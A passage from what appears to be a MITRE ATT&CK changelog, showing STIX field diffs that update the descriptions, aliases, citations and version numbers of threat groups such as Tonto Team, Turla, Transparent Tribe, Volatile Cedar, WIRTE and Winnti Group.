| external_references | {'source_name': 'Trend Micro Iron Tiger April 2021', 'description': 'Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.', 'url': 'https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html'} | |
| external_references | {'source_name': 'Trend Micro DRBControl February 2020', 'description': 'Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.', 'url': 'https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf'} | |
| external_references | {'source_name': 'Nccgroup Emissary Panda May 2018', 'description': 'Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.', 'url': 'https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/'} |
| Description |
|---|
| [Tonto Team](https://attack.mitre.org/groups/G0131) is a suspected Chinese state-sponsored cyber espionage threat group that has primarily targeted South Korea, Japan, Taiwan, and the United States since at least 2009; by 2020 they expanded operations to include other Asian as well as Eastern European countries. [Tonto Team](https://attack.mitre.org/groups/G0131) has targeted government, military, energy, mining, financial, education, healthcare, and technology organizations, including through the Heartbeat Campaign (2009-2012) and Operation Bitter Biscuit (2017).(Citation: Kaspersky CactusPete Aug 2020)(Citation: ESET Exchange Mar 2021)(Citation: FireEye Chinese Espionage October 2019)(Citation: ARS Technica China Hack SK April 2017)(Citation: Trend Micro HeartBeat Campaign January 2013)(Citation: Talos Bisonal 10 Years March 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 20:56:22.161000+00:00 | 2022-01-27 17:51:41.433000+00:00 |
| external_references[1]['source_name'] | Earth Akhlut | Tonto Team |
| external_references[1]['description'] | (Citation: TrendMicro Tonto Team October 2020) | (Citation: Talos Bisonal Mar 2020) |
| external_references[2]['source_name'] | BRONZE HUNTLEY | Earth Akhlut |
| external_references[2]['description'] | (Citation: Secureworks BRONZE HUNTLEY ) | (Citation: TrendMicro Tonto Team October 2020) |
| external_references[3]['source_name'] | CactusPete | BRONZE HUNTLEY |
| external_references[3]['description'] | (Citation: Kaspersky CactusPete Aug 2020) | (Citation: Secureworks BRONZE HUNTLEY ) |
| external_references[4]['source_name'] | Karma Panda | CactusPete |
| external_references[4]['description'] | (Citation: Kaspersky CactusPete Aug 2020)(Citation: CrowdStrike Manufacturing Threat July 2020) | (Citation: Kaspersky CactusPete Aug 2020) |
| external_references[5]['source_name'] | Kaspersky CactusPete Aug 2020 | Karma Panda |
| external_references[5]['description'] | Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021. | (Citation: Kaspersky CactusPete Aug 2020)(Citation: CrowdStrike Manufacturing Threat July 2020) |
| external_references[6]['source_name'] | ESET Exchange Mar 2021 | Kaspersky CactusPete Aug 2020 |
| external_references[6]['description'] | Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021. | Zykov, K. (2020, August 13). CactusPete APT group’s updated Bisonal backdoor. Retrieved May 5, 2021. |
| external_references[6]['url'] | https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ | https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/ |
| external_references[7]['source_name'] | FireEye Chinese Espionage October 2019 | ESET Exchange Mar 2021 |
| external_references[7]['description'] | Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021. | Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021. |
| external_references[7]['url'] | https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf | https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ |
| external_references[8]['source_name'] | ARS Technica China Hack SK April 2017 | FireEye Chinese Espionage October 2019 |
| external_references[8]['description'] | Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021. | Nalani Fraser, Kelli Vanderlee. (2019, October 10). Achievement Unlocked - Chinese Cyber Espionage Evolves to Support Higher Level Missions. Retrieved October 17, 2021. |
| external_references[8]['url'] | https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/ | https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf |
| external_references[9]['source_name'] | Trend Micro HeartBeat Campaign January 2013 | ARS Technica China Hack SK April 2017 |
| external_references[9]['description'] | Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021. | Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021. |
| external_references[9]['url'] | https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf? | https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/ |
| external_references[10]['source_name'] | Talos Bisonal 10 Years March 2020 | Trend Micro HeartBeat Campaign January 2013 |
| external_references[10]['description'] | Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021. | Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021. |
| external_references[10]['url'] | https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html | https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf? |
| external_references[11]['source_name'] | TrendMicro Tonto Team October 2020 | Talos Bisonal 10 Years March 2020 |
| external_references[11]['description'] | Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021. | Warren Mercer, Paul Rascagneres, Vitor Ventura. (2020, March 6). Bisonal 10 Years of Play. Retrieved October 17, 2021. |
| external_references[11]['url'] | https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf | https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html |
| external_references[12]['source_name'] | Secureworks BRONZE HUNTLEY | Talos Bisonal Mar 2020 |
| external_references[12]['description'] | Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021. | Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022. |
| external_references[12]['url'] | https://www.secureworks.com/research/threat-profiles/bronze-huntley | https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html |
| external_references[13]['source_name'] | CrowdStrike Manufacturing Threat July 2020 | TrendMicro Tonto Team October 2020 |
| external_references[13]['description'] | Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021. | Daniel Lughi, Jaromir Horejsi. (2020, October 2). Tonto Team - Exploring the TTPs of an advanced threat actor operating a large infrastructure. Retrieved October 17, 2021. |
| external_references[13]['url'] | https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/ | https://vb2020.vblocalhost.com/uploads/VB2020-06.pdf |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Secureworks BRONZE HUNTLEY ', 'description': 'Secureworks. (2021, January 1). BRONZE HUNTLEY Threat Profile. Retrieved May 5, 2021.', 'url': 'https://www.secureworks.com/research/threat-profiles/bronze-huntley'} | |
| external_references | {'source_name': 'CrowdStrike Manufacturing Threat July 2020', 'description': 'Falcon OverWatch Team. (2020, July 14). Manufacturing Industry in the Adversaries’ Crosshairs. Retrieved October 17, 2021.', 'url': 'https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/'} |
| Description |
|---|
| [Transparent Tribe](https://attack.mitre.org/groups/G0134) is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-25 17:19:00.720000+00:00 | 2022-09-22 20:27:21.053000+00:00 |
| external_references[1]['source_name'] | COPPER FIELDSTONE | Mythic Leopard |
| external_references[1]['description'] | (Citation: Secureworks COPPER FIELDSTONE Profile) | (Citation: Crowdstrike Mythic Leopard Profile)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021) |
| external_references[2]['source_name'] | APT36 | COPPER FIELDSTONE |
| external_references[2]['description'] | (Citation: Talos Transparent Tribe May 2021) | (Citation: Secureworks COPPER FIELDSTONE Profile) |
| external_references[3]['source_name'] | Mythic Leopard | APT36 |
| external_references[3]['description'] | (Citation: Crowdstrike Mythic Leopard Profile)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021) | (Citation: Talos Transparent Tribe May 2021) |
| external_references[5]['source_name'] | Proofpoint Operation Transparent Tribe March 2016 | Crowdstrike Mythic Leopard Profile |
| external_references[5]['description'] | Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016. | Crowdstrike. (n.d.). Mythic Leopard. Retrieved October 6, 2021. |
| external_references[5]['url'] | https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf | https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/ |
| external_references[7]['source_name'] | Talos Transparent Tribe May 2021 | Unit 42 ProjectM March 2016 |
| external_references[7]['description'] | Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021. | Falcone, R. and Conant S. (2016, March 25). ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe. Retrieved September 2, 2021. |
| external_references[7]['url'] | https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html | https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/ |
| external_references[8]['source_name'] | Secureworks COPPER FIELDSTONE Profile | Proofpoint Operation Transparent Tribe March 2016 |
| external_references[8]['description'] | Secureworks. (n.d.). COPPER FIELDSTONE. Retrieved October 6, 2021. | Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016. |
| external_references[8]['url'] | https://www.secureworks.com/research/threat-profiles/copper-fieldstone | https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf |
| external_references[9]['source_name'] | Crowdstrike Mythic Leopard Profile | Talos Transparent Tribe May 2021 |
| external_references[9]['description'] | Crowdstrike. (n.d.). Mythic Leopard. Retrieved October 6, 2021. | Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021. |
| external_references[9]['url'] | https://adversary.crowdstrike.com/en-US/adversary/mythic-leopard/ | https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html |
| external_references[10]['source_name'] | Unit 42 ProjectM March 2016 | Secureworks COPPER FIELDSTONE Profile |
| external_references[10]['description'] | Falcone, R. and Conant S. (2016, March 25). ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe. Retrieved September 2, 2021. | Secureworks. (n.d.). COPPER FIELDSTONE. Retrieved October 6, 2021. |
| external_references[10]['url'] | https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe/ | https://www.secureworks.com/research/threat-profiles/copper-fieldstone |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Turla](https://attack.mitre.org/groups/G0010) is a Russian-based threat group that has infected victims in over 45 countries, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies since 2004. Heightened activity was seen in mid-2015. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns and leveraging in-house tools and malware. [Turla](https://attack.mitre.org/groups/G0010)’s espionage platform is mainly used against Windows machines, but has also been seen used against macOS and Linux machines.(Citation: Kaspersky Turla)(Citation: ESET Gazer Aug 2017)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla Mosquito Jan 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://securelist.com/the-epic-turla-operation/65545/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-27 14:36:25.289000+00:00 | 2022-09-28 21:27:07.133000+00:00 |
| external_references[1]['source_name'] | Turla | Belugasturgeon |
| external_references[1]['description'] | (Citation: Kaspersky Turla) | (Citation: Accenture HyperStack October 2020) |
| external_references[2]['source_name'] | Group 88 | Krypton |
| external_references[2]['description'] | (Citation: Leonardo Turla Penquin May 2020) | (Citation: CrowdStrike VENOMOUS BEAR) |
| external_references[3]['source_name'] | Belugasturgeon | Snake |
| external_references[3]['description'] | (Citation: Accenture HyperStack October 2020) | (Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla PowerShell May 2019)(Citation: Talos TinyTurla September 2021) |
| external_references[4]['source_name'] | Waterbug | Venomous Bear |
| external_references[4]['description'] | Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.(Citation: Symantec Waterbug) | (Citation: CrowdStrike VENOMOUS BEAR)(Citation: Talos TinyTurla September 2021) |
| external_references[5]['source_name'] | WhiteBear | Turla |
| external_references[5]['description'] | WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.(Citation: Securelist WhiteBear Aug 2017) | (Citation: Kaspersky Turla) |
| external_references[6]['source_name'] | VENOMOUS BEAR | Group 88 |
| external_references[6]['description'] | (Citation: CrowdStrike VENOMOUS BEAR) | (Citation: Leonardo Turla Penquin May 2020) |
| external_references[7]['source_name'] | Snake | IRON HUNTER |
| external_references[7]['description'] | (Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla PowerShell May 2019) | (Citation: Secureworks IRON HUNTER Profile) |
| external_references[8]['source_name'] | Krypton | Accenture HyperStack October 2020 |
| external_references[8]['description'] | (Citation: CrowdStrike VENOMOUS BEAR) | Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020. |
| external_references[9]['source_name'] | Kaspersky Turla | Waterbug |
| external_references[9]['description'] | Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014. | Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.(Citation: Symantec Waterbug) |
| external_references[10]['source_name'] | ESET Gazer Aug 2017 | Talos TinyTurla September 2021 |
| external_references[10]['description'] | ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017. | Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021. |
| external_references[10]['url'] | https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf | https://blog.talosintelligence.com/2021/09/tinyturla.html |
| external_references[11]['source_name'] | CrowdStrike VENOMOUS BEAR | ESET Turla Mosquito Jan 2018 |
| external_references[11]['description'] | Meyers, A. (2018, March 12). Meet CrowdStrike’s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018. | ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018. |
| external_references[11]['url'] | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/ | https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf |
| external_references[12]['source_name'] | ESET Turla Mosquito Jan 2018 | ESET Gazer Aug 2017 |
| external_references[12]['description'] | ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018. | ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017. |
| external_references[12]['url'] | https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf | https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf |
| external_references[13]['source_name'] | Leonardo Turla Penquin May 2020 | ESET Turla PowerShell May 2019 |
| external_references[13]['description'] | Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021. | Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019. |
| external_references[13]['url'] | https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf | https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ |
| external_references[14]['source_name'] | Accenture HyperStack October 2020 | Securelist WhiteBear Aug 2017 |
| external_references[14]['description'] | Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020. | Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017. |
| external_references[14]['url'] | https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity | https://securelist.com/introducing-whitebear/81638/ |
| external_references[15]['source_name'] | Symantec Waterbug | Kaspersky Turla |
| external_references[15]['description'] | Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015. | Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014. |
| external_references[15]['url'] | https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1 | https://securelist.com/the-epic-turla-operation/65545/ |
| external_references[16]['source_name'] | Securelist WhiteBear Aug 2017 | Leonardo Turla Penquin May 2020 |
| external_references[16]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017. | Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA “Penquin_x64”. Retrieved March 11, 2021. |
| external_references[16]['url'] | https://securelist.com/introducing-whitebear/81638/ | https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf |
| external_references[17]['source_name'] | ESET Turla PowerShell May 2019 | CrowdStrike VENOMOUS BEAR |
| external_references[17]['description'] | Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019. | Meyers, A. (2018, March 12). Meet CrowdStrike’s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018. |
| external_references[17]['url'] | https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ | https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/ |
| x_mitre_version | 2.1 | 3.0 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | IRON HUNTER | |
| aliases | Venomous Bear | |
| external_references | {'source_name': 'Secureworks IRON HUNTER Profile', 'description': 'Secureworks CTU. (n.d.). IRON HUNTER. Retrieved February 22, 2022.', 'url': 'http://www.secureworks.com/research/threat-profiles/iron-hunter'} | |
| external_references | {'source_name': 'Symantec Waterbug', 'description': 'Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.', 'url': 'https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1'} | |
| external_references | {'source_name': 'WhiteBear', 'description': 'WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.(Citation: Securelist WhiteBear Aug 2017)(Citation: Talos TinyTurla September 2021)'} |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | VENOMOUS BEAR |
| Description |
|---|
| [Volatile Cedar](https://attack.mitre.org/groups/G0123) is a Lebanese threat group that has targeted individuals, companies, and institutions worldwide. [Volatile Cedar](https://attack.mitre.org/groups/G0123) has been operating since 2012 and is motivated by political and ideological interests.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-10 21:01:16.908000+00:00 | 2022-04-20 20:08:15.870000+00:00 |
| external_references[3]['source_name'] | CheckPoint Volatile Cedar March 2015 | ClearSky Lebanese Cedar Jan 2021 |
| external_references[3]['description'] | Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021. | ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021. |
| external_references[3]['url'] | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf | https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf |
| external_references[4]['source_name'] | ClearSky Lebanese Cedar Jan 2021 | CheckPoint Volatile Cedar March 2015 |
| external_references[4]['description'] | ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021. | Threat Intelligence and Research. (2015, March 30). VOLATILE CEDAR. Retrieved February 8, 2021. |
| external_references[4]['url'] | https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| [WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. The group focuses on targeting Middle East defense and diplomats.(Citation: Lab52 WIRTE Apr 2019) | [WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:50:57.491000+00:00 | 2022-04-15 19:50:19.478000+00:00 |
| description | [WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. The group focuses on targeting Middle East defense and diplomats.(Citation: Lab52 WIRTE Apr 2019) | [WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021) |
| x_mitre_version | 1.2 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Kaspersky WIRTE November 2021', 'description': 'Yamout, M. (2021, November 29). WIRTE’s campaign in the Middle East ‘living off the land’ since at least 2019. Retrieved February 1, 2022.', 'url': 'https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044'} |
| Old Description | New Description |
|---|---|
| [Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: 401 TRG Winnti Umbrella May 2018) | [Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: 401 TRG Winnti Umbrella May 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-05 15:59:50.451000+00:00 | 2022-04-15 16:27:20.897000+00:00 |
| description | [Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044). (Citation: 401 TRG Winnti Umbrella May 2018) | [Winnti Group](https://attack.mitre.org/groups/G0044) is a threat group with Chinese origins that has been active since at least 2010. The group has heavily targeted the gaming industry, but it has also expanded the scope of its targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015) Some reporting suggests a number of other groups, including [Axiom](https://attack.mitre.org/groups/G0001), [APT17](https://attack.mitre.org/groups/G0025), and [Ke3chang](https://attack.mitre.org/groups/G0004), are closely linked to [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: 401 TRG Winnti Umbrella May 2018) |
| external_references[3]['source_name'] | Kaspersky Winnti April 2013 | Symantec Suckfly March 2016 |
| external_references[3]['description'] | Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017. | DiMaggio, J. (2016, March 15). Suckfly: Revealing the secret life of your code signing certificates. Retrieved August 3, 2016. |
| external_references[3]['url'] | https://securelist.com/winnti-more-than-just-a-game/37029/ | http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates |
| external_references[4]['source_name'] | Kaspersky Winnti June 2015 | 401 TRG Winnti Umbrella May 2018 |
| external_references[4]['description'] | Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016. | Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018. |
| external_references[4]['url'] | https://securelist.com/games-are-over/70991/ | https://401trg.github.io/pages/burning-umbrella.html |
| external_references[5]['source_name'] | Novetta Winnti April 2015 | Kaspersky Winnti April 2013 |
| external_references[5]['description'] | Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. | Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017. |
| external_references[5]['url'] | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf | https://securelist.com/winnti-more-than-just-a-game/37029/ |
| external_references[6]['source_name'] | 401 TRG Winnti Umbrella May 2018 | Novetta Winnti April 2015 |
| external_references[6]['description'] | Hegel, T. (2018, May 3). Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State-Sponsored Attackers. Retrieved July 8, 2018. | Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. |
| external_references[6]['url'] | https://401trg.github.io/pages/burning-umbrella.html | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf |
| external_references[7]['source_name'] | Symantec Suckfly March 2016 | Kaspersky Winnti June 2015 |
